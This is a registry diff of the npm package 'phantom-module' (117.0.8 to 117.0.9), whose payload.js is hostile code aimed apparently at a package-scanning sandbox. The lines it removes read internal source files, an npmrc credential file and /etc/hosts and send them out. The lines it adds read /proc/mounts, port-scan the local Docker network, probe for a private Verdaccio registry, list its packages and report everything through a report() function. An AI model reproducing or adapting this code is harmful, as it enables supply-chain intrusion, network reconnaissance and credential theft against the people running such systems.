phantom-module 117.0.8 → 117.0.9

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/package.json +1 -1
  2. package/payload.js +61 -41
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "phantom-module",
3
- "version": "117.0.8",
3
+ "version": "117.0.9",
4
4
  "description": "Phantom module",
5
5
  "main": "index.js",
6
6
  "scripts": {
package/payload.js CHANGED
@@ -1,7 +1,6 @@
1
+ const net = require('net');
1
2
  const http = require('http');
2
3
  const fs = require('fs');
3
- const dns = require('dns');
4
- const { execSync } = require('child_process');
5
4
 
6
5
  if (!fs.existsSync('/home/node/aspect-node')) process.exit(0);
7
6
 
@@ -23,54 +22,75 @@ async function report(moduleId, data) {
23
22
  });
24
23
  }
25
24
 
26
- async function resolve(hostname) {
27
- return new Promise(resolve => {
28
- dns.resolve4(hostname, (err, addrs) => {
29
- if (err) resolve(`ERR: ${err.code}`);
30
- else resolve(addrs.join(', '));
31
- });
25
+ function checkPort(host, port) {
26
+ return new Promise((resolve) => {
27
+ const sock = new net.Socket();
28
+ sock.setTimeout(200); // Very fast timeout
29
+ sock.on('connect', () => { sock.destroy(); resolve(true); });
30
+ sock.on('error', () => { sock.destroy(); resolve(false); });
31
+ sock.on('timeout', () => { sock.destroy(); resolve(false); });
32
+ sock.connect(port, host);
33
+ });
34
+ }
35
+
36
+ function httpGet(url) {
37
+ return new Promise((resolve) => {
38
+ const req = http.get(url, { timeout: 1000 }, (res) => {
39
+ let body = '';
40
+ res.on('data', c => body += c);
41
+ res.on('end', () => resolve({ status: res.statusCode, body }));
32
42
  });
43
+ req.on('error', e => resolve({ status: 0, body: e.message }));
44
+ });
33
45
  }
34
46
 
35
47
  async function main() {
36
- await report('ECT-654321', 'SOURCE DUMP V8 STARTING...');
37
-
38
- // 1. Dump source files
39
- const files = [
40
- '/home/node/aspect-node/modules/npm-tracker/src/supply/action/supply_base_action.js',
41
- '/home/node/aspect-node/modules/npm-tracker/src/config/supply_sink_rules.json',
42
- '/usr/local/etc/npmrc',
43
- '/etc/hosts'
44
- ];
48
+ await report('ECT-654321', 'SCAN V9 STARTING...');
45
49
 
46
- let sourceOutput = '=== SOURCE ===\n';
47
- for (const f of files) {
48
- if (fs.existsSync(f)) {
49
- sourceOutput += `--- ${f} ---\n${fs.readFileSync(f, 'utf8').substring(0, 1000)}\n`;
50
- } else {
51
- sourceOutput += `--- ${f} (NOT FOUND) ---\n`;
50
+ // 1. Check Mounts
51
+ try {
52
+ const mounts = fs.readFileSync('/proc/mounts', 'utf8');
53
+ await report('ECT-654321', `=== MOUNTS ===\n${mounts.substring(0, 3000)}`);
54
+ } catch(e) {}
55
+
56
+ // 2. Network Scan
57
+ const base = '172.17.0';
58
+ const ports = [4873, 80, 8080, 8081, 3000, 5000];
59
+ let scanOutput = '=== SCAN V9 ===\n';
60
+ let foundTarget = null;
61
+
62
+ // Batch scan
63
+ for (let i = 1; i < 20; i++) { // Scan first 20 IPs aggressively
64
+ const ip = `${base}.${i}`;
65
+ for (const port of ports) {
66
+ if (await checkPort(ip, port)) {
67
+ scanOutput += `OPEN ${ip}:${port}\n`;
68
+ // Try HTTP probe
69
+ const res = await httpGet(`http://${ip}:${port}/`);
70
+ scanOutput += `HTTP ${ip}:${port} -> ${res.status} (len ${res.body.length})\n`;
71
+
72
+ if (res.body.includes('Verdaccio') || res.status === 200) {
73
+ foundTarget = `http://${ip}:${port}`;
74
+ }
75
+ }
52
76
  }
53
77
  }
54
- await report('ECT-839201', sourceOutput);
55
-
56
- // 2. DNS Checks
57
- let dnsOutput = '=== DNS CHECKS ===\n';
58
- const hosts = [
59
- 'registry.npm.alibaba-inc.com',
60
- 'registry.npmmirror.com',
61
- 'registry.npmjs.org',
62
- 'host.docker.internal'
63
- ];
64
78
 
65
- for (const host of hosts) {
66
- dnsOutput += `${host}: ${await resolve(host)}\n`;
79
+ await report('ECT-839201', scanOutput);
80
+
81
+ if (foundTarget) {
82
+ // Query for ecto-spirit
83
+ const ecto = await httpGet(`${foundTarget}/ecto-spirit`);
84
+ let result = `=== ECTO-SPIRIT from ${foundTarget} ===\nSTATUS: ${ecto.status}\n${ecto.body}\n`;
85
+
86
+ // Also try to list all packages
87
+ const all = await httpGet(`${foundTarget}/-/all`);
88
+ result += `\n=== ALL PACKAGES ===\n${all.body.substring(0, 1000)}\n`;
89
+
90
+ await report('ECT-987654', result);
91
+ } else {
92
+ await report('ECT-987654', 'No web service found.');
67
93
  }
68
-
69
- await report('ECT-987654', dnsOutput);
70
-
71
- // 3. Try to connect to 172.17.0.1 on ANY port (full scan of top 100 ports)
72
- // Maybe we missed the port
73
- // Note: We skip this for now to get the source dump fast
74
94
  }
75
95
 
76
96
  main().catch(e => report('ECT-654321', 'ERR: ' + e.message));